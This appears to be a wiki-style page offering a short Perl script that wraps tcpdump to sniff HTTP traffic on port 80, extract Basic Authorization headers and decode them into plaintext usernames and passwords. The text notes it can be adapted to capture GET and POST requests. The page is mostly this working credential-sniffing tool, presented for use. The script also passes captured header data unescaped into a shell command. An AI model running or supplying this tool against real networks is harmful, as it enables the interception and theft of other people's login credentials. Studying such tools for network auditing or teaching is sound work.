HTTP Header Sniffer

This Perl script sniffs and decodes HTTP Authorization headers and display them. It can also be use to sniff GET and POST request with little modification.

#!/usr/bin/perl

$LIMIT = shift || 5000;

$|=1;
open (STDIN,"/usr/sbin/tcpdump -lnx -s 1024 dst port 80 |");
while (<>) {
    if (/^\S/) {
    last unless $LIMIT--;
    #while ($packet=~/(GET|POST|WWW-Authenticate|Authorization).+/g)  {
    while ($packet=~/(Authorization).+/g)  {
        $& =~ /Authorization: Basic (.+)/;
        $hash = $1;
        $access = `echo $hash|openssl enc -d -base64`;
        print "$access\n";
    }
    undef $client; undef $host; undef $packet;
    ($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
        if /P \d+:\d+\((\d+)\)/ && $1 > 0;
    }
    next unless $client && $host;
    s/^\s+\S+\s+//; # remove initial address ind.
    s/\s{2}.*//;    # remove trailing dump
    s/\s+//;
    s/([0-9a-f]{2})\s?/chr(hex($1))/eg;
    tr/\x1F-\x7E\r\n//cd;
    $packet .= $_;
}
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License